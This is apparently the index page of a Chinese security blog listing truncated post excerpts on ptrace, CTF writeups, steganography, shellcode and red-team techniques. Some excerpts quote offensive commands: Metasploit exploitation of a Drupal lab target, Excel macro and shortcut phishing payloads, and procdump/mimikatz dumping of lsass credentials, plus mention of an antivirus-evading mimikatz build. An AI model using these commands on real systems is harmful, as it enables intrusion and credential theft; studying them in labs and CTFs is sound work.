TypechoJoeTheme

Harvey

统计
登录
用户名
密码
/
注册
用户名
邮箱
2021-03-04

linux-沙盒入门,ptrace从0到1

linux-沙盒入门,ptrace从0到1
前言本文是在linux系统角度下,对ptrace反调试进行底层分析,使我们更清楚的看到一些底层原理的实现,更好的理解在逆向工程中的一些突破口,病毒怎么实现代码注入,本文还将列出一些常见的攻防手段,分析其原理,让我们一同见证见证茅与盾激情对决!什么是ptrace?如果了解过逆向工程的小伙伴,肯定对这个ptrace不陌生,因为这是反调试技术中的基础入门手段,虽然现在诸如代码虚拟化之类的其他防逆向技术已经很成熟了,但是ptrace仍然是一些商业软件产品中使用,也是我们入门反调试所必须的基础技术!ptrace在linux 反调试技术中的地位就如同nc在安全界的地位,瑞士军刀啊!ptrace使用场景:编写动态分析工具,如gdb,strace反追踪,一个进程只能被一个进程追踪(注:一个进程能同时追踪多个进程),若此进程已被追踪,其他基于ptrace的追踪器将无法再追踪此进程,更进一步可以实现子母进程双线执行动态解密代码等更高级的反分析技术代码注入,往其他进程里注入代码。不退出进程,进行在线升级。简介Ptrace 可以让父进程控制子进程运行,并可以检查和改变子进程的核心image的功能(Pee...
Harvey
2021-03-04

Gamma实验室

24 阅读
0 评论
2021年03月04日
24 阅读
0 评论
2021-03-03

DC-1靶机渗透测试报告

DC-1靶机渗透测试报告
立个flag:一天一个DC机(滑稽 下载地址:https://blog.harvey.plus/index.php/Mine/54.html准备工作DC-1(nat模式);kali(nat模式)信息搜集打开DC-1页面如下:(没给账号密码需要自己渗透进去首先我们对其进行内网扫描arp-scan -l这里我直接浏览器对其访问发现的Wappalyzer查看其服务信息发现cms是Drupal 7或者用nmap扫描nmap -sP 192.168.232.0/24接着扫波目录,发现都没啥卵用dirb http://192.168.232.141/漏洞攻击msf搜索目标cms版本漏洞,实现渗透msfconsole search Drupalemmm,这里我们就用最新的漏洞use 6 set rhost 192.168.232.141 show options run芜湖,exit后选择4(第二新的)成功getshell反弹式的shell,进入交互界面shell python -c 'import pty;pty.spawn("/bin/sh")' # 产生一个原生的终端...
Harvey
2021-03-03

Mine,笔记

23 阅读
0 评论
2021年03月03日
23 阅读
0 评论
2021-02-28

CTF-图片隐写那些事儿

CTF-图片隐写那些事儿
前言懒狗今天决定整理一下图片隐写上的一些工具[line]我可没辣么简单.png[/line]1.F5-steganography一款F5隐写工具(kali)(PS:需要密码)kali安装命令(也可直接下载):git clone https://github.com/matthewgao/F5-steganography加密:java Embed 原图.jpg 生成图.jpg -e 隐藏的文件.txt -p '密码'解密:java Extract 生成图.jpg -p '密码'[line]举个栗子吧~[/line]2.steghideSteghide是一种隐写程序,能够隐藏各种图像和音频文件中的数据。颜色方面的样本频率不会更改,因此使嵌入抗一阶统计检验。Windows下官网下载地址:http://steghide.sourceforge.net/download.php加密:steghide embed -cf .\原图.jpg -ef 隐藏的文件.txt 然后还要输入密码,确认密码解密:steghide extract -p '密码' -sf .\生成图.jpg 输入 y 确认[...
Harvey
2021-02-28

CTF,Mine,笔记

31 阅读
0 评论
2021年02月28日
31 阅读
0 评论
2021-02-24

shellcode编写指南

shellcode编写指南
1.前言linux的shellcode就不用说了,直接通过一个int 0x80系统调用,指定想调用的函数的系统调用号(syscall),传入调用函数的参数,即可,懂的都懂。在windows中,没有像int 0x80系统调用功能来找相应的函数,但是也有syscall这样的系统调用,过AV奇效,这里主要介绍的是如何手动去通过GetProcAddress去查找某个函数的地址,然后进行调用,这里需要一丢丢c基础和汇编基础。2.原理在windows中,我们需要如下步骤去找到相应的函数,进行调用:1)找到PEB表,获取Kernel32.dll base地址2)通过kernel32.dll PE文件格式找到导出表的地址3)通过导出表定位GetProcAddress的RVA4)通过GetProcAddress函数找到LoadLibraryA函数地址5)通过这GetProcAddress和LoadLibraryA两个函数来加载dll文件和查找函数以供使用先了解几个基本概念,api函数,动态链接库文件。2.1 kernel32.dll定义:kernel32.dll是windows中非常重要的32位动...
Harvey
2021-02-24

Gamma实验室

30 阅读
0 评论
2021年02月24日
30 阅读
0 评论
2021-02-21

2021SXCCTF

2021SXCCTF
签到http://106.55.249.213:5002/祝各位大佬,大大佬,新春快乐!2021 更加牛13!!!flag在短片中:flag{Happy_New_Year_2021}MiscFlag不在这Flag真的不在这,你要相信我,知道吗!打开显示Flag不在这!于是放入010发现是个压缩包,打开发现flag.txt:flag{It's_real_easy!D0_Y0u_Like_it?}牛年大吉要相信自己,他就是flag!查看属性发现flag:flag{这个就是哦!}网络深处网络深处! 千万不要一个人大晚上做哦!!!原题就不写了.滑稽.jpghttps://blog.harvey.plus/index.php/Writeup/2020UNCTF-%E5%85%AC%E5%BC%80%E8%B5%9B.html#%E7%BD%91%E7%BB%9C%E6%B7%B1%E5%A4%841拼图你也喜欢鬼刀吗?montage合成 + gaps对大图遗传算法解拼图①.montage(Windows)(PS:将其改为1200X1200)montage "D:\Harvey\赛...
Harvey
2021-02-21

Writeup

47 阅读
0 评论
2021年02月21日
47 阅读
0 评论
2021-02-20

红队技巧-网络钓鱼

红队技巧-网络钓鱼
前言涵盖了现在大多数红队钓鱼的手法,一直以来钓鱼配合免杀,更能出奇制胜!1. excel宏执行任意命令新建一个exel表,然后打开,对准这个右键点击插入宏。然后在第一切换到宏,复制粘贴如下语句:=EXEC("notepad") =HALT()必须带=HALT(),不然虽然命令执行了,但会报错,容易露馅!然后测试一下,选中语句,右键,点击执行:就会弹出notepad:通过msf生成msi文件,python开启http服务,然后替换命令为攻击载荷,右键隐藏宏,并把文件执行方式改为Auto_open,直接复制粘贴,按一下enter就行了然后另存,2016版本记得点击否,然后得选择一个启用宏的文件,远方服务器监听:就欧克了,当然这里肯定不止这个msi文件,都能执行命令了,该怎么利用,你懂的!2 Link钓鱼:随便选择一个应用或者文件,右键点击创建快捷方式,右键打开属性:我们需要更改目标这里的目标,这里的目标路径改成我们的攻击载荷,下面的起始位置可以不更改,基本上没啥影响。修改:C:\Windows\System32\cmd.exe /c powershell -nop...
Harvey
2021-02-20

红队手册,Gamma实验室

38 阅读
0 评论
2021年02月20日
38 阅读
0 评论
2021-02-18

2021NEWSCTF

2021NEWSCTF
0X1 Miscmisc签到处binwalk得到了个flag.txt,base64得到flag:flag{Welc0me_t0_newsctf!!!}伪装者https://wws.lanzous.com/ihGAlldzfmb flag格式:flag{}Hint:steghide修改rar头文件得到以下信息①.背景.txt小林 正在追一部剧,但是他忘了剧名中一位角色的名字,于是他截了个图(好看的剧.png),开始了询问环节. -----你能帮小林认出这是谁嘛 注:角色名字(中文拼音)是压缩包的密码②.好看的剧.png③.通过以上信息可以得知压缩包密码: wangtianfeng ;得到niu.jpg④.key.wav(steghide隐写需要用到的密码)(PS:和GKCTF中Harley Quinn的考点一样)最后一小段可以听到拨号声,将其提取出来(因为后面提及的工具只能分析几十秒内的音频QAQ),DTMF,利用 工具(提取码:oy3x) 得到如下信息手机键盘密码解出key = ctfisfun最后得到flag(bushi划到最底下可以看到以下信息:熊曰:呋食很誒咯...
Harvey
2021-02-18

Writeup

46 阅读
0 评论
2021年02月18日
46 阅读
0 评论
2021-02-17

红队技巧-导出凭据和密码

红队技巧-导出凭据和密码
前言红队中各种抓取密码凭据的方法,文末彩蛋,内附工具链接,以及我制作的过360的minikatz的版本,各位请享用,最近筹备重新开blog,记录学习计划,不然知识我学完立马就忘了,与大家一起学习!1.Procdump转储Lsass.exe的内存前提:需要管理员及以上权限常用命令:procdump -accepteula -ma lsass.exe lsass_dump导出的.dmp文件本地配合minikatz 取出密码sekurlsa::Minidump lsassdump.dmp sekurlsa::logonPasswords如果对lsass.exe敏感的话,那么还可以配合lsass.exe的pid来使用更香:procdump -accepteula -ma pid lsass.dmp2.wce导出hash前提:需要管理员及以上权限,版本限制(仅支持Windows XP,2003,Vista,7、2008和Windows 8)命令:wce.exe -o file.txt wec.exe3.comsvcs.dll转储LSASS.exe内存前提:在powershell中运行,管...
Harvey
2021-02-17

红队手册,Gamma实验室

38 阅读
0 评论
2021年02月17日
38 阅读
0 评论
2021-02-15

Powerview脚本和Windowsdefender的恩恩怨怨

Powerview脚本和Windowsdefender的恩恩怨怨
前言起因,是我想测试一下,powersploit的免杀效果,然后就去github下载了powersploit的脚本集合包,powerview脚本也给集合进去了,然后就引发了一些列感到令人疑惑的事。过程当我导入recon信息收集模块的时候,windows defender 报毒了,给我阻止了按照以往的查找特征码手法,是挨个文件试,结果被我发现是powerview.ps1这个脚本被windows defender报毒,范围进一步缩小。然后就开始免杀windows defender的尝试,我开始把一些脚本里的特征字符,多余的字符,比如什么介绍,注释什么的都删掉,删掉了一部分再次尝试导入:依然失败,我把windows defender 来直接扫描文件,没有报毒,说明静态过了的,那肯定是动态行为没过。powershell 脚本过amsi挺多方法的,比如字符拼接,编码,变量替换等等,但是powerview很长一段的代码,我得逐行去试,去找特征字符串,那真的难受死了。因为我本人也不是很懂powershell,所以没去尝试,然后想到一个过windows defender的办法,感觉挺简单的那就是...
Harvey
2021-02-15

Gamma实验室

40 阅读
0 评论
2021年02月15日
40 阅读
0 评论
2021-02-14

HGAME 2021 WEEK2

HGAME 2021 WEEK2
0X1Misc1.Tools工欲善其事,必先利其器。附件(提取码:glal)很明显看附件名就知道是F5隐写首先我们查看属性得知其密码:!LyJJ9bi&M7E72*JyD,进而得到压缩包密码: e@317S*p1A4bIYIs1M又是一层加密...同样的处理方法,就是这次是steghide隐写,得到压缩包密码:u0!FO4JUhl5!L55%$&好家伙!经典老套娃了这回是Outguess隐写,同样的手法得到压缩包密码:@UjXL93044V5zl2ZKI终于到最后一层加密了,JPHS隐写得到压缩包密码:xSRejK1^Z1Cp9M!z@H最终将四块拼接起来组成一个完整的二维码,扫码得到flag:hgame{Taowa_is_N0T_g00d_but_T001s_is_Useful}2.Telegraph:1601 6639 3459 3134 0892他曾经最喜欢的曲师写的曲子,让人犹如漫步在星空之下,可如今他听见只觉得反胃。由于文件名过长,单独给出附件的md5: E5C3EE3F441B860B07A3ADCD98BFFC00请将flag以hgame{your_...
Harvey
2021-02-14

Writeup

46 阅读
0 评论
2021年02月14日
46 阅读
0 评论
2021-02-12

再见2020,你好2021!

再见2020,你好2021!
前言:原本身为懒狗的我是不准备写这年度总结滴QAQbut 跨年夜外面就和打战一样一炮接一炮(吵死个人),最终爬起来简单写一下总结20202020年初由于疫情不用去学校使得我有大把时间浪,老赛棍的我参加了许多场比赛(签到选手~)也正是因此认识许多志群道和的师傅们,期间泻药0kami邀请加入了N1ce一起打比赛,感谢各位陪伴我一起走过了那段可能让我很无聊的时光!接着就到了一年两度的期末考了,感谢线上考试让我轻松及格以及电路分析补考顺利过关~nice!对了,考前参加的DozerCTF还拿了个优(安)秀(慰)奖接着就是一波安逸的暑假还有好多就不一一列出了~很快就通知开学了,得去学校了(有一说一我是真不想去学校QAQ)好日子就这样没了一到学校就各种奇奇怪怪的规矩(突然想阴阳怪气~不过渣渣二本也就这样了,认命吧大过年的还是整喜庆点⑧√开学后我就大二啦,喜提学长称号由于我们学校断层了,开学后我接手了网络安全协会的会长一职(本人其实并不是很想当接着就是一年一度的网络安全宣传周,各地省赛接踵而至,我们大福建当然也不列外,不过由于疫情,百越杯被冲掉,黑盾杯变成线上赛,不过工控进入决赛使得我有幸去了人...
Harvey
2021-02-12

Mine,笔记

53 阅读
0 评论
2021年02月12日
53 阅读
0 评论
2021-02-10

burp-2021-2破解版下载

burp-2021-2破解版下载
前言此次版本更新如下内容(此版本改进了消息检查器、非打印字符显示、平台身份验证控件和嵌入式浏览器)详情如下1.提供了一个新的漏洞定义和几个bug修正新的漏洞定义:当目标应用程序导入具有已知漏洞的JavaScript依赖项时,易受攻击的JavaScript依赖项ciesburp Scanner现在将检测到,例如,当一个图书馆已经过时或有其他危险时问题。非-打印字符改进在文本编辑器中查看非打印字符时,十六进制代码点低于20的字符将显示为带有十六进制代码的“菱形”。现在,代码点从7F到FF的字符也会显示在同一行中路。每-平台身份验证的主机控件现在可以在每个主机上打开或关闭平台身份验证(在“用户选项”和“连接”选项卡下)基本信息检查器改进消息中的性能有了显著的改进检查员。此外,用户现在可以水平调整消息检查器的大小,并同时选择多个条目一次,嵌入浏览器改进不再发送由嵌入式Chromium浏览器本身而不是用户发起的HTTP请求。2.Burp的嵌入式浏览器已升级到Chromium 88.0.4324.150。3.错误修复和小改进此版本还提供以下错误修复和小改进:当在macOS上处于全屏模式时,H...
Harvey
2021-02-10

工具推送,Gamma实验室

45 阅读
0 评论
2021年02月10日
45 阅读
0 评论
2021-02-07

HGAME 2021 WEEK1

HGAME 2021 WEEK1
0X1Misc1.Base全家福新年即将来临之际,Base家族也团聚了,他们用他们特有的打招呼方式向你问了个好,你知道他们在说什么吗? R1k0RE1OWldHRTNFSU5SVkc1QkRLTlpXR1VaVENOUlRHTVlETVJCV0dVMlVNTlpVR01ZREtSUlVIQTJET01aVUdSQ0RHTVpWSVlaVEVNWlFHTVpER01KWElRPT09PT09base64->base32->base162.不起眼压缩包的养成的方法0x4qE给了张图给我,说这图暗藏玄机,你能帮我找出来吗?很明显是个压缩包,打开发现加密了~提示如下锘縋assword is picture ID (Up to 8 digits)猜测密码为其P站ID,识图得到其ID:70415155,成功解压https://graph.baidu.com/s?sign=12672a6df695e369823b901612610051&f=all&tn=pc&tn=pc&srcp=&idctag=gz&sids=10006_1080...
Harvey
2021-02-07

Writeup

44 阅读
0 评论
2021年02月07日
44 阅读
0 评论
Harvey
最怕碌碌无为还叹平凡可贵
101 文章数
11 评论量

人生倒计时

今日已经过去小时
这周已经过去
本月已经过去
今年已经过去个月

标签云

微博热搜榜

  • 获取失败!

今日天气